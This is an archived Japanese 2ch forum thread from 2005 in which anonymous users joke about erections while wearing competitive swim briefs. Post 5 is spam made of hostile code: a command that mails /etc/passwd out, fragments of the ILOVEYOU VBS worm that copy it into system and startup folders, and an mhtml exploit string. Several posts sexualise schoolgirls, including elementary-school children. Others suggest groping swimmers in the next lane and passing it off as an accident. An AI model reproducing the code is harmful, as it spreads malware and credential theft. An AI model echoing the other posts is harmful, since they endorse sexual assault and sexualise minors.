2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

競パン穿いてるとき勃起したらどうするの?

1 :名無しさん@お腹いっぱい。:2005/08/15(月) 19:17:44 ID:7ts49onL
きになる

2 :名無しさん@お腹いっぱい。:2005/08/15(月) 19:20:21 ID:TWIzWjPj
2

3 :名無しさん@お腹いっぱい。:2005/08/15(月) 19:37:41 ID:xuwHm7j+
前傾姿勢で泳ぐ!笑

4 :名無しさん@お腹いっぱい。:2005/08/15(月) 20:10:50 ID:lkViLghZ
不思議と水の中では勃起しない。

5 :名無しさん@お腹いっぱい。:2005/08/15(月) 20:45:25 ID:CeVqdv6E
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT

6 :名無しさん@お腹いっぱい。:2005/08/18(木) 05:19:33 ID:d47ME4n5
4と同じ。水の中でなくても勃起したことない。
その気配すらない。頭のスイッチが切り替わらない
ようになっているのでしょう。


7 :名無しさん@お腹いっぱい。:2005/08/18(木) 05:48:23 ID:fX71yPM8
>>4>>6
確かに勃たない。
キレイめのネエちゃんの平泳ぎを後方ビタ付けして
泳いでても無反応。

8 :名無しさん@お腹いっぱい。:2005/08/19(金) 20:23:02 ID:KQiR6XnK
勃起しても誰にも気付かれない大きさですから

9 :名無しさん@お腹いっぱい。:2005/08/19(金) 20:25:13 ID:UlLOnZwT
擦る

10 :名無しさん@お腹いっぱい。:2005/08/19(金) 21:08:14 ID:om/9p/3z
>>8
うらやましいっす

11 :名無しさん@お腹いっぱい。:2005/08/20(土) 01:09:14 ID:piQXkbXc
半だちならある。ちょっと気が抜けたとき。横に直すだけ。

12 :名無しさん@お腹いっぱい。:2005/08/20(土) 06:25:10 ID:EQr7of9q
ある!

競パンが小さくて、頭が出た!
急いで水に潜った

13 :名無しさん@お腹いっぱい。:2005/08/20(土) 07:38:15 ID:UAVtqvMm
>11,12

貴様らスイマーじゃないだろ。迷惑なんだよな、そういうやつらが
プールに来ると。来るな。

14 :名無しさん@お腹いっぱい。:2005/08/20(土) 09:39:23 ID:LcTsbLt4
勃起しても水に入れば超サイヤ人じゃなくなる。


15 :名無しさん@お腹いっぱい。:2005/08/30(火) 16:35:43 ID:tr4Eme7p
今日リアルに勃起した。
今迄で一番腹の立ったことを想像して、治めた

16 :名無しさん@お腹いっぱい。:2005/08/31(水) 15:02:00 ID:eb+5ZR+3
大会のアップで勃起しました…かわいい娘の乳首が透けてて丸見えだったから。

17 :名無しさん@お腹いっぱい。:2005/08/31(水) 15:09:30 ID:XKqegc5f
>>15
具体的にどんなことが「一番腹が立った」ことなのか気になるw

漏れの場合、こういう場面で思い出す悲しいことは親父が死んだこと。

18 :名無しさん@お腹いっぱい。:2005/08/31(水) 15:22:29 ID:EnqZqcpA
ボッキを抑えるために親父を使うのか?

そんなことに親父を使って後ろめたくないのか?俺にはできん

19 :名無しさん@お腹いっぱい。:2005/09/01(木) 00:50:04 ID:Fdam/km5
>>12のように勃起によってはみ出た場合でも「はみチン」と呼んでいいのかどうか悩んでみた。

20 :名無しさん@お腹いっぱい。:2005/09/01(木) 07:30:46 ID:wxdwzuw6
せめてサポーターは はこう!

これで勃起しても大丈夫!

21 :名無しさん@お腹いっぱい。:2005/09/01(木) 07:31:48 ID:0LM4PZR1
>>20
サポータはく奴はキモい。

22 :名無しさん@お腹いっぱい。:2005/09/01(木) 10:58:40 ID:Qe1zeYAb
競パンってなに?

23 :名無しさん@お腹いっぱい。:2005/09/01(木) 11:11:12 ID:xe94oySU
>>13
ヽ(#゜Д゜)ノ┌┛)‘Д゜)ガッ!!

24 :名無しさん@お腹いっぱい。:2005/09/01(木) 17:57:02 ID:7fqi9hq6
>>22
コスプレ用のパンツ

25 :名無しさん@お腹いっぱい。:2005/09/01(木) 18:04:40 ID:Fdam/km5
おまいらは肝心なとき持続しないで余計なとき勃つんだな

26 :13:2005/09/03(土) 01:42:39 ID:cThOfV3B
>25
しょうがないよ、まともに泳げないから余計なこと考えて
プールで暇つぶししてるような奴らだから。

だから来るなといっているのに。

27 :名無しさん@お腹いっぱい。:2005/09/07(水) 00:10:39 ID:coMCyY2X
>>26
このホモチンがああ!
一生懸命泳いでいても目の前で競泳水着を着た女子の尻が
揺れていれば、膨張するのは仕方あるまい。男なら分かるだろーが。

ちなみにオレは下反りなんであまり目立たない。

28 :名無しさん@お腹いっぱい。:2005/09/07(水) 02:40:00 ID:oYicJK10
つまり地面に向かってのびるんだろ?

29 :名無しさん@お腹いっぱい。:2005/09/07(水) 15:04:17 ID:dYH5h23F
いつも女子と一緒に練習してるけど勃起したことないよ!尻より胸のほうが見えて楽しいよ

30 :名無しさん@お腹いっぱい。:2005/09/07(水) 16:11:09 ID:DZJnxKkq
隣どおしのコースですれ違う時、相手背泳ぎ、私クロールだったんだけど、
思いっきり胸を捕まれてびっくりしたの。それよりびっくりしたのは、その男の子
練習サイクル終わってないのに突然走ってトイレ行ってしまったぁぁぁ…
そのとき同じ選手の子と見たんだけど、なんか下半身が変形してて、そっちにびっくりした。
体をさわられるとか、さわるとか、私や他の選手の女の子にしたら案外普通だと思ってたから、まさか
反応されるとは…どうやって処理したかは知んないけどね(^^)

31 :名無しさん@お腹いっぱい。:2005/09/07(水) 17:04:06 ID:EgukyHWm
アソコもさりげなく触れば怪しまれないですかね?

32 :名無しさん@お腹いっぱい。:2005/09/07(水) 18:26:02 ID://ABvqMF
中学のとき部活で友達がRod調整してるのを先生が見てからかってた

33 :名無しさん@お腹いっぱい。:2005/09/07(水) 19:30:54 ID:EyGcQ+DW
私は綺麗な女性の水着姿を見てよく勃起します。
競泳水着を着た女性は凄くセクシーです。
さすがに泳いでいる最中は勃起はしませんが、プールサイドでの休憩時間など
では興奮してしまうことがあります。
普段は勃起してもそのままにしていますが、あまりに激しくてムラムラきたとき
はトイレに行って即オナニーします。


34 :名無しさん@お腹いっぱい。:2005/09/07(水) 20:32:12 ID:oYicJK10
ザワザワ ザワザワ ザワザワ
(゚Д゚)Д゚)゚Д(゚Д゚)
Д゚(゚Д゚(゚Д(゚Д゚)゚)
゚Д゚)゚Д゚(゚Д゚)゚Д゚)
(゚Д゚)Д゚)゚Д(゚Д゚)
Д゚(゚Д゚(゚Д(゚Д゚)゚)
゚Д゚)゚Д゚(゚Д゚)゚Д゚)

35 :名無しさん@お腹いっぱい。:2005/09/08(木) 12:10:19 ID:PtV1MiLC

  ♪    ドン ドン ドン タカタッタ
    ∧ ∧   ,,──,−、  ♪
    (,,゚Д゚) / (:  :(  ) ))  盛り上がってまいりました
     |つ/つ  `ー─``ー'
   〜|  |   ┣━━┫┨
    U U   ┠┤  ┣┫


36 :名無しさん@お腹いっぱい。:2005/09/08(木) 13:31:31 ID:z53nBs8c
>>1
俺前偶然女子中学生の手があそこに当たっちゃって思わず勃起しちゃって、
ビキニから亀頭がはみ出ちゃったけど、おさまるまでず〜っとプールの端のほうで
見られないように前屈してたよ。
その後、プールからあがるときにその女子中学生がニヤニヤしてたけど、もしかしてわざと?

37 :名無しさん@お腹いっぱい。:2005/09/08(木) 14:54:58 ID:T9pzS5H6
>>31
「あっ(●^Д^●;)」って私たちは思うけど、セクハラとは絶対にいわれないよ。
競泳中の事故に出来る。

38 :名無しさん@お腹いっぱい。:2005/09/08(木) 14:57:15 ID:5uBHJMAh
37は現役?

39 :名無しさん@お腹いっぱい。:2005/09/08(木) 19:56:51 ID:4fG7wH3p
じゃあ今度さりげなく隣のコースにいる娘のアソコ触ってみます!

40 :名無しさん@お腹いっぱい。:2005/09/08(木) 20:23:24 ID:T9pzS5H6
>>38
練習行って来ました(^^)
現役選手です。

41 :名無しさん@お腹いっぱい。:2005/09/08(木) 20:32:49 ID:4fG7wH3p
触られたときってどんな感じですか?

42 :38:2005/09/08(木) 20:52:19 ID:GnqemWFM
お疲れ!
現役なんだ〜部活でやってるの?スクール?>37

43 :40:2005/09/08(木) 21:00:01 ID:T9pzS5H6
>>41
ん〜「あぁ〜あ」って感じ(^∂^)

>>42
幼稚園の頃からずっと選手でやってるよん。なかなかタイム伸びないから
そろそろ引退を考えてる…(^^;)

44 :名無しさん@お腹いっぱい。:2005/09/08(木) 21:20:07 ID:LYHjcV3U
俺も現役のスイマーだけど、そもそもそんな変な気持ちにならないぞ。

45 :38:2005/09/08(木) 21:33:54 ID:GnqemWFM
そうなの?まだ、がんばりなよ!!てか、今何歳なの?>40

46 :40:2005/09/08(木) 21:48:05 ID:T9pzS5H6
>>45
20歳だよん。もう無理でしょ〜…(^^;)これからはおばちゃんにまじって
自分でメニュー組んでやるしかないかな〜。全国とか結構行けそうだったんだけど、
自己管理が苦手みたいで、なかなかね〜うまくいかなかった。頑張れっていってくれて
ありがと♪

>>44
「あぁ〜あ…まあ仕方ないか…泳いでる時は文句言えないや…」っていう
あきらめのため息です。わたしも変な気分にはならないよ。

47 :38:2005/09/08(木) 22:13:24 ID:a81//3oF
俺も今帰宅♪20か〜タメだよ(^^)20ならまだ伸びる可能性あるんじゃない?柴田だって遅咲きだったじゃん?そうなんだ。どっかに所属してるなら、自己管理とかあまりしなくてもいい感じするけどね。

48 :名無しさん@お腹いっぱい。:2005/09/08(木) 22:20:55 ID:QPXE0ZLB
でな、勃起してるとき競パン穿いたらどうするの?

49 :名無しさん@お腹いっぱい。:2005/09/08(木) 23:03:03 ID:A1eP24kC
おさまるまで待てよ

50 :名無しさん@お腹いっぱい。:2005/09/08(木) 23:10:17 ID:BXkIEy5t
勃起したら水中で出して、ちんこで水を掻いてスピードアップさせる

51 :名無しさん@お腹いっぱい。:2005/09/09(金) 03:29:47 ID:x6fj2nSF
1の質問に対する答えは、
「競泳の選手はプールにいるときは頭のスイッチが切り替わるように
できているから、そもそも勃起などしないというかできない。
乳首が立っていようが、半分お尻が出ていようが何とも思わないし、
思えないように頭の構造ができあがっている。」

素人には信じられないかもしれないが、本当のこと。

52 :名無しさん@お腹いっぱい。:2005/09/09(金) 15:56:03 ID:3dtsRXdZ
決め付けんなよ!

53 :名無しさん@お腹いっぱい。:2005/09/09(金) 22:05:12 ID:87kHW1nc
51さん 競泳をよくわかってますね

54 :名無しさん@お腹いっぱい。:2005/09/09(金) 22:43:49 ID:qjqB28qB
一応、競泳してました、勿論部活もしてまして、そのものズバリ「水泳部」
(競泳部と書けないのが悔しい)
俺は変態かもしれんが・・・・・・・・・
いや男として・・・・・
すっかりバリバリ現役を退いたにも関わらず、今でもプールではどんなエロイのを
見ても反応しない・・・・・・・・・・・

>>51
わかる・・・・

55 :名無しさん@お腹いっぱい。:2005/09/10(土) 07:10:24 ID:MqhLR0ji
つttp://www.yukawanet.com/cgi-yukawanet/file/html/koufun.html


56 :名無しさん@そうだ選挙に行こう:2005/09/10(土) 21:46:50 ID:sGxhIV6Z
         _,,..,,,,_
        /    ⊃ヽ-、__
        l    /      ヽ
      /`'ー-/____/



57 :名無しさん@お腹いっぱい。:2005/09/14(水) 15:59:53 ID:iUi4obJI
         _,,..,,,,_ チラ
        ./ ' 3  `ヽーっ
        l ゚ ⊃ ⌒_つ
         `'ー---‐'''''"


58 :名無しさん@お腹いっぱい。:2005/09/19(月) 12:08:56 ID:SLOVl8fh
俺もそうだよ。エロサイト行っては毎日抜いてるロリ変態だが、
勃起はしない。目の前に小学生のヒップラインがあろうが
乳首が透けていようが、●レメが薄っすらと見えていようがな。


59 :名無しさん@お腹いっぱい。:2005/09/19(月) 17:20:16 ID:qgYyFlCf
          _,,...,,,,_  ___
         .▼ ,   /     ヽ-、__
         /▲..,3__/            /
       /_,,./,'3 /         /
      / ,' 3`ー/          /
      ./l   ⊃         /
     / `ー--|_______/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


60 :名無しさん@お腹いっぱい。:2005/09/23(金) 14:52:32 ID:bssUOxNc

               /⌒ヽ
               ( 人  )
               |  |
               | ノ(|
               |.⌒|
              _,,..,,,_|  |
            / ,' 3 |  |ーっ
            l   ⊃ ⌒_つ
             `'ー---‐'''''"
   ∧_∧  … …
   (   )
   |   |
   し‐-J


61 :名無しさん@お腹いっぱい。:2005/10/07(金) 23:45:45 ID:kShVYR5j
>>60
オレもこんぐらいデカかったらなあ・・

62 :名無しさん@お腹いっぱい。:2005/10/08(土) 00:06:45 ID:7h+W2IWE
自分はスポーツ好きだけど、タイプの女性はスポーツなんかしたことがないような
か弱い女性が好きなんで、スイミングクラブにいる女性を見て反応するって事がない。
プールサイドをドタドタと走る女のライフセーバーを見ると萎える。

63 :名無しさん@お腹いっぱい。:2005/10/08(土) 00:29:05 ID:LhqaQkxo
>>51
に同意だけど、俺の場合は尿意を突然もよおしてトイレに駆け込んで
「フー・・・・」と安心して競パンからチンコを出した時に
何故か半立ちになる事がある。

64 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:52:56 ID:eJhwS8jb
「競パン」はいわゆるゲイ用語ですね(w

65 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:55:01 ID:eJhwS8jb
「競パン」でぐぐってみた
ttp://www.google.com/search?hl=ja&ie=Shift_JIS&q=%8B%A3%83p%83%93&btnG=Google+%8C%9F%8D%F5&lr=

66 :名無しさん@お腹いっぱい。:2005/10/08(土) 11:30:40 ID:FRoO4TiT
ウホッ!

67 :名無しさん@お腹いっぱい。:2005/10/10(月) 23:37:13 ID:4eCraolf
私は女子部員の水着姿には興奮します。
高校生の頃は制服姿の女の子を見るだけでも勃起していたから、ましてその子たちが水着
姿になろう物なら興奮するのは当然です。
さすがに練習がきついときは女の子のことを考える余裕はありませんが、プールサイドでの
女の子のセクシーな水着姿に勃起しまくりです。
抱きつきたくなるときもありましたが、そういうときはトイレに行ってオナニーしていました。


68 :名無しさん@お腹いっぱい。:2005/10/11(火) 10:55:08 ID:iVcdTFek
男のサガだな

69 :名無しさん@お腹いっぱい。:2005/10/11(火) 11:01:30 ID:NHk6YEuv
身長166 体重49
顔 安西ひろこ
年齢 31歳(毒女)
彼女が書いた一言が、こんな波紋を起こすなんて...

「プールでじろじろ見る♂は市ね」
http://human5.2ch.net/test/read.cgi/sfe/1127787470/l50

  この人とっても面白いです!

70 :名無しさん@お腹いっぱい。:2005/10/11(火) 12:13:54 ID:iVcdTFek
水着でシャラポワしてると拝みたくなるね

71 :名無しさん@お腹いっぱい。:2005/10/11(火) 12:16:11 ID:iVcdTFek
ハイレグを復活させて

72 :名無しさん@お腹いっぱい。:2005/10/11(火) 12:35:09 ID:iVcdTFek
脱げ!

73 :名無しさん@お腹いっぱい。:2005/10/11(火) 22:58:23 ID:B4Q9NHXL
>>67
これが男の本音じゃないでしょうか。
私も何度女の子の水着姿に興奮して、抱きつきたくなるのを我慢したことか。
そういうときはオナニーして慰めるしかありません。

74 :名無しさん@お腹いっぱい。:2005/10/12(水) 10:10:32 ID:03XJnCjk
>>51>>54 同意

元水泳選手の相方も言っていたが、使い込んで薄くなった水着を着てる女子水泳選手とか普通にいるから、耐性が出来て起たんと言ってた。
中学や高校の頃からそんなの見てりゃそうなるのか…

75 :名無しさん@お腹いっぱい。:2005/10/25(火) 16:26:27 ID:l+VB8Ixw
勃起チンポが競パンの紐に阻まれて、競パンの中痛いくらい
ビンビンになります 変形競パン!

76 :名無しさん@お腹いっぱい。:2005/10/25(火) 20:28:15 ID:OscIHUP6
hahaha

77 :名無しさん@お腹いっぱい。:2005/10/26(水) 14:54:26 ID:j4ZRI8v8
    _  
  ( ゚∀゚)
  (  ∩ミ  ブンブン
   | ωつ,゙ 
   し ⌒J 

    _  
  ( ゚∀゚)
  (    )      (゚д゚ )
   | ωつ――――ノヽノ |  
   し ⌒J        < <

    _, ,_  
  ( ゚Д゚)  
  (    )          (゚д゚ )
   | ω==≠つ――――ノヽノ |  
   し ⌒J            < <

    _, ,_  
  ( ゚Д゚)      ブチッ!! 
  (    )   ∴:;         (゚д゚ )
   | ω==ゝ”ヽ=つ――――ノヽノ |  
   し ⌒J               < <

                     ( ゚д゚ )
       ∴:;          ノヽノ |
⊂(。Д。⊂⌒`つ    .;つ__j < <

78 :名無しさん@お腹いっぱい。:2005/10/26(水) 15:07:50 ID:0tJAqsCJ
↑ははは

79 :名無しさん@お腹いっぱい。:2005/10/26(水) 22:13:37 ID:v0ABluWT
やっぱりな、水泳やってる奴はそんなことばかり考えてる
下劣な奴らなんだ。

80 :名無しさん@お腹いっぱい。:2005/10/27(木) 00:33:55 ID:wKI4wbTZ
77↑おもしろい

81 :名無しさん@お腹いっぱい。:2005/10/27(木) 00:44:53 ID:ZGzz8jkL
74に同意

82 :名無しさん@お腹いっぱい。:2005/10/27(木) 07:28:18 ID:ohewqziT
 ______
|    _, ,_    |
| 〔( -Д-)〕  |
(⌒⌒⌒⌒⌒⌒⌒)
|⌒⌒⌒ <⌒ヽ o 。 うあぁぁん
|      <_  ヽ。
|      o とノ ノつ
|       。  | 〜つ


83 :名無しさん@お腹いっぱい。:2005/10/30(日) 11:32:29 ID:5xf1bRQM
泣くな!

84 :名無しさん@お腹いっぱい。:2005/10/30(日) 13:34:55 ID:0Y2wlTcE
http://bbs.girlswalker.com/topic.php?cate=SP_008&gid=見たらわかる

85 :運動神経名無しさん:2005/10/30(日) 21:39:24 ID:2GRF4lIv
若い綺麗なお姉さんがハイレグ競泳水着着てると
綺麗な女性だなとは思うが、泳ぎまくってると疲労で
チンコ勃つことに神経が行かない。

86 :名無しさん@お腹いっぱい。:2005/11/01(火) 02:38:05 ID:fplqmnFp
>>77

これが面白いならこのスレは気に入ると思う。

http://love3.2ch.net/test/read.cgi/gaysaloon/1124534932/

87 :名無しさん@お腹いっぱい。:2005/11/02(水) 18:10:13 ID:gI4cAfzz
bokki

88 :名無しさん@お腹いっぱい。:2005/11/02(水) 21:19:44 ID:yh07mfZP
チンコが競パンから出てもそのままにする

89 :名無しさん@お腹いっぱい。:2005/11/03(木) 23:56:31 ID:ExIiFaKG
スイマータオルでかくす

90 :名無しさん@お腹いっぱい。:2005/11/04(金) 14:32:24 ID:hkA/49K5
ヘタに隠したり、腰を引いたりすると
勃起してるのがバレバレ。

従ってオレは、

堂々としている。
生理現象なので致し方ない

91 :名無しさん@お腹いっぱい。:2005/11/04(金) 19:59:06 ID:CHQvWUc/
カリペロ

92 :TA:2005/11/06(日) 23:25:44 ID:GULQs3rT
隣のコースの女性達が速くて、クロールのオレが彼女たちの平泳ぎに負けて、
次々抜かされた時、だんだん大きくなって、出してしまった。

93 :名無しさん@お腹いっぱい。:2005/11/06(日) 23:36:56 ID:5rbBw0U1
それは、男の俺が女に負けるなんて・・という劣等感が快感に変わったという
M気からくる勃起ですか?

94 :名無しさん@お腹いっぱい。:2005/11/07(月) 14:07:36 ID:Ox5Dr1vj
>>92
プールの中で出すなよ。

95 :名無しさん@お腹いっぱい。:2005/11/10(木) 01:07:34 ID:li4ubwbI
>>85
私は勃起しまくりでダメです。
若い女性がハイレグの競泳水着着ていると、もう泳ぎそっちのけで見とれてしまいます。
競泳水着を着ている人はなんかみんな美人に見えてしまいます。
私のアソコはビンビンに勃起してしまいます。
特に興奮したときはトイレに行って抜きます。

96 :名無しさん@お腹いっぱい。:2005/11/14(月) 12:28:29 ID:7BSgKpWf
(゜凵K)


97 :名無しさん@お腹いっぱい。:2005/11/15(火) 08:48:08 ID:ERGLk1T4
すぐにプールの中に入ってしまう。泳いでいるうちにおさまる。

98 :名無しさん@お腹いっぱい。:2005/11/15(火) 12:30:41 ID:Ce0EQyTu
褌が勃起しやすいね

99 :名無しさん@お腹いっぱい。:2005/11/15(火) 16:33:03 ID:MnTVkGkk
っっーか水泳経験者は勃起しまくったりしないよねー女の競泳水着は好きだけどさすがにね!俺も好きだけどだしたりはしない!このスレ変態バッカ

100 :名無しさん@お腹いっぱい。:2005/11/15(火) 17:26:23 ID:L5oKD1kq
確かに・・・笑


101 :名無しさん@お腹いっぱい。:2005/11/16(水) 17:24:28 ID:Kx9hStUA
競パンをはいているときに勃起したら、もうお手上げだね。
何しろ普段でもぎりぎりしか隠せないくらい小さいんだから、少しでも充血したらもうだめ。
完全に勃起したら、おさまるわけがないだろうが。
斜めに倒すなんて絶対無理だね。直立したペニスが、競パンから外に飛び出して、ぴくぴくうなるばかり。
今度誰かで試してみたら面白いよ。真っ赤になって困っている顔が見てみたいね。
一度勃起したらなかなかおさまるもんじゃないしね。

でも残念ながら不思議とプールでは勃起しないね。やっぱり人目があるからね。




102 :名無しさん@お腹いっぱい。:2005/11/17(木) 01:16:02 ID:Qbqm848S
勃起したら女にデカイなぁと言われる…

103 :名無しさん@お腹いっぱい。:2005/11/17(木) 06:14:44 ID:ZXaN5UW4
>>51

なるほど。

水泳監視員はどうなんでしょう?
一日中競パンってこともあるでしょ。

104 :名無しさん@お腹いっぱい。:2005/11/18(金) 11:52:21 ID:HdiP+JhR
ahe

105 :名無しさん@お腹いっぱい。:2005/11/19(土) 16:15:46 ID:pY4g1bZk
101に同意。
オレもなんとか横向きにして押さえている状態だから、2サイズ下でのただでさえ脇の
細い競泳パンだから、カリ首凸凹は勿論絶対丸見えになってしまう。
しかし現実には勃起なんかしない、というか勃起するようなことを考える余裕が無い。
まあ、部活の休憩時や合宿での朝ダチは無くもないが・・・。


106 :名無しさん@お腹いっぱい。:2005/11/20(日) 00:34:45 ID:M1DPwGkf
11/19(土) 23:46      GmeXp8UB
⇒ ⇒ ( ゚,_ゝ゚)バカジャネーノ

107 :名無しさん@お腹いっぱい。:2005/11/22(火) 17:00:37 ID:lbOL1HeT
                 (^ω^ )
          <⌒/ヽ-、__ノヽノ |
        /<_/____/ < <
         ̄ ̄ ̄ ̄ ̄ ̄ ̄



                      (゚д゚ )
          <⌒ヽ    /ヽ-、__ノヽノ |
        /<___ノ ̄ ̄/____/ < <


108 :名無しさん@お腹いっぱい。:2005/11/23(水) 11:35:22 ID:YLotJSaL
すっげー小さな競パンをはいた男を見ると、何とかして勃起させて困らせてやりたくなるのはオレだけですか?

109 :名無しさん@お腹いっぱい。:2005/11/23(水) 12:53:08 ID:uClEL48z
確かに勃起したらかなりまずいけど
泳いでると立たないよね
血液が回らないから無理
水着も見慣れるしね



110 :名無しさん@お腹いっぱい。:2005/11/23(水) 17:17:23 ID:JR+iW9SE
とりあえず、トイレに駆け込みオナるしかないな

111 :名無しさん@お腹いっぱい。:2005/11/23(水) 18:07:01 ID:LD+6NXjy
111

112 :名無しさん@お腹いっぱい。:2005/11/23(水) 23:40:00 ID:+xi/YQB3
>>95
勃起しまくりというほどではありませんが、セクシーな女性を見ると勃ってしまうことはあります。
でも、残念ながらそういう方を見る機会は少ないです。

ただ、男としてセクシーな女性の水着姿を見て勃つというのはごく自然で、むしろ、勃たない方が
やばいと思います。
普通に勃起したときはしばらく放っておくと元に戻りますが、激しく勃起したときはトイレに行って
抜きます。

113 :名無しさん@お腹いっぱい。:2005/11/24(木) 15:27:55 ID:PN2nMfKb
南米のヌーディストビーチに逝った経験あり
入り口で渡されるパンフには「ボキーしたら海に入れ」と書いてあった
実際、浜辺で寝転んでいる脇をカリオカ女がフェロモン出しまくりで通り抜けると
絶対ボキーする そんなときはタオルで隠すかうつ伏せになって鎮めるが、
それでもなおかつ頑強に言うこと聞かないボキー状態の場合は、
怒髪を天に向けながら急いで海に飛び込む

するとあら不思議・・・・いつの間にやら平時に戻る


114 :名無しさん@お腹いっぱい。:2005/11/24(木) 23:03:03 ID:yYcdmCBj
>>108
HG?

115 :名無しさん@お腹いっぱい。:2005/12/04(日) 02:32:46 ID:jf1qAnre
先っちょだけ ちょこんっ て出て恥ずかしかった思い出がある


116 :名無しさん@お腹いっぱい。:2005/12/04(日) 03:22:04 ID:R2qIsDn9
着替えしている奴が、ぼっ起しているのは、何度も見たことあるな・・・

ぴっちりパンツでぼっ起をぎゅっと押さえつけているけど、
脱いだ時に、ぴ〜〜んとなっちゃうわけ。
皆、照れくさいから直ぐにパンツ履こうとするけどね。

117 :名無しさん@お腹いっぱい。:2005/12/05(月) 14:22:40 ID:ROervGJ3
更衣室で勃起・・
つまり男の裸を見て立ったわけだな。
ナーントなく感じていたが、やっぱり
水泳とホモは切り離せないのか

118 :名無しさん@お腹いっぱい。:2005/12/05(月) 14:29:45 ID:fkET1h93
シンガポール観光の際、リゾートホテルの屋上プールで白人観光客と一緒したことがある。
若い白人女性は7名皆、トップレスでした。競泳用ビキニを穿いていた俺は愚息が勃起。
先っちょが出て恥ずかしかったが、気持ち良かった。シャワー室は男女別だったが、その女性らが通り道にあって、勃起をモロ見られた。
ヨーロッパ人男性と一緒だったが俺のと大差なかった。
勃起時17cm、非勃起時、10cmです。その時その屋上プールにはアジア人は俺一人でした。
だいたい、勃起時はプールの水の中か更衣室に駆け込みますね!




119 :名無しさん@お腹いっぱい。:2005/12/05(月) 14:34:03 ID:PaRmZvqw
>>118
ヨーロッパ人男性も競泳用ビキニを穿いてた?

120 :名無しさん@お腹いっぱい。:2005/12/07(水) 00:11:14 ID:iA68oO3Y
Hしててどんな時が気持ちイイ?いい声出されたとき?女の感じてる顔?ちんこ舐られたとき?

121 :名無しさん@お腹いっぱい。:2005/12/08(木) 13:18:56 ID:vWbpYgrg
競泳パンツを履いてプールで水中に居る時、勃起はおろか、精液まで流した俺様がきましたよ


122 :名無しさん@お腹いっぱい。:2005/12/09(金) 11:52:04 ID:4exLMHuc
プールでは何故か勃起しないけど、海では開放感からかすぐ勃起する。
スレスレ競パンで甲羅干ししてたら、すぐ近くで仰向けで寝そべってた南米系風女が
寝返って、尻をこちらに向けた。な、なんと「ティーバック、、、」
俺は慌ててうつ伏せになったが、熱い砂が快感をさらに刺激し、すぐに爆発。
最高に気持ちよかったな。

123 :名無しさん@お腹いっぱい。:2005/12/09(金) 13:50:40 ID:NHGu4Gb2
>>1
おかんの裸

124 :名無しさん@お腹いっぱい。:2005/12/10(土) 11:44:26 ID:Qt5B7J/Y
よく平常時の大きいヤツは勃起してもあんまり大きくならない
みたいだな。そういうヤツはいいな。
俺は平静時7センチ勃起時17センチだから・・
顔見知りになったライフガードの♀がいて、彼女なんか多分何気に
俺のモッコ利の大きさチェックしてるだろうから、一度、競泳水着の彼女がコース
ロープを直すために四つん這いになった時なんか発射寸前で大変だった。
収まるまでストレッチの前屈をして誤魔化したよ。

125 :名無しさん@お腹いっぱい。:2005/12/10(土) 11:50:27 ID:DOgo17YB
いい形した尻見て、オーッ
と思ったりはするけど、チンコはピクリともしないなぁ。

126 :名無しさん@お腹いっぱい。:2005/12/10(土) 16:56:07 ID:bTZMw7cq
精神統一 平常心

127 :名無しさん@お腹いっぱい。:2005/12/13(火) 01:08:12 ID:kU2hgrA6
>125
はみ毛はどうですか?

128 :名無しさん@お腹いっぱい。:2005/12/13(火) 15:00:28 ID:AWN3AYgz
>>127
食べる。

129 :名無しさん@お腹いっぱい。:2005/12/17(土) 14:09:00 ID:L8Bevk6O
>>128
おいしいですか?

130 :名無しさん@お腹いっぱい。:2005/12/17(土) 14:09:44 ID:bTkzHYgX
encl1e55-v.ouji-awnh@docomo.ne.jp
全部教えてやるからメールよこせ

131 :名無しさん@お腹いっぱい。:2005/12/17(土) 20:44:51 ID:SIUIg9oy
あげ

132 :名無しさん@お腹いっぱい。:2005/12/17(土) 22:19:07 ID:2u+rfgN+
30過ぎるとそもそも勃起自体あまりない

ジャグジーでボケーっと妄想してる時に半勃ちになることがあるくらいだな

プール内での勃起はまずありえん

133 :名無しさん@お腹いっぱい。:2005/12/17(土) 22:24:20 ID:nJPaqny0
俺冬は寒くてちぢんでる

134 :名無しさん@お腹いっぱい。:2005/12/18(日) 01:16:10 ID:UYW6a1NU
いつでもビンビン

135 :名無しさん@お腹いっぱい。:2005/12/18(日) 01:30:41 ID:+dd19lCH
どこでもビンビン

136 :名無しさん@お腹いっぱい。:2005/12/18(日) 16:10:17 ID:C8nKLG0a
競パンで勃起?
実際にプールで競パンをはいたことのないやつの妄想スレだな。
がんがん泳いでいれば、勃起どころか、なさけなくなるほど縮んでしまうのが現実だ。

137 :名無しさん@お腹いっぱい。:2005/12/19(月) 10:27:11 ID:zrQZhvQa
>>136
確かにね。
ただ、俺の行ってる公営プールは
水泳教室やってる時あって、中学生か高校生くらい
の女子が競泳水着着て泳いでるから・・

確実に困った状態になることもありますよ

138 :名無しさん@お腹いっぱい。:2005/12/19(月) 18:21:28 ID:50Qu5xVg
もしも水泳習うスイミングコースでコーチが女性で体操とかしているときに勃起してしまったらどうしますか?女性のコーチって勃起したりしてるのとか気が付いているのかな・・・?

139 :名無しさん@お腹いっぱい。:2005/12/19(月) 19:11:22 ID:bb+VSk86
気付いてますね。

140 :名無しさん@お腹いっぱい。:2005/12/19(月) 19:41:04 ID:6jVEr7+T
以前スイムレッスンを受けたときなんですが、プールサイドに座ってバタ脚の練習とき女性コーチが足を持って動かしてくれることがあって勃起してしまいました。
やっぱり自分の場合もコーチは気付いてたのかな?
このスレは女性は見てないと思いますが、スクールで働いてる男性コーチの人で女性コーチが「レッスンの時お客さんが勃起してた」とか話するのを聞いたことありますか?
やっぱりレッスン中に勃起するなんて変態とか思われてるんでしょうか?

141 :名無しさん@お腹いっぱい。:2005/12/19(月) 20:39:48 ID:46RMlQgC
勃起なんか男として健康な証拠だよ。女コーチは見たこ所で気にしてる
場合じゃないですよ。勃起したままレッスン受け続けてればよし。

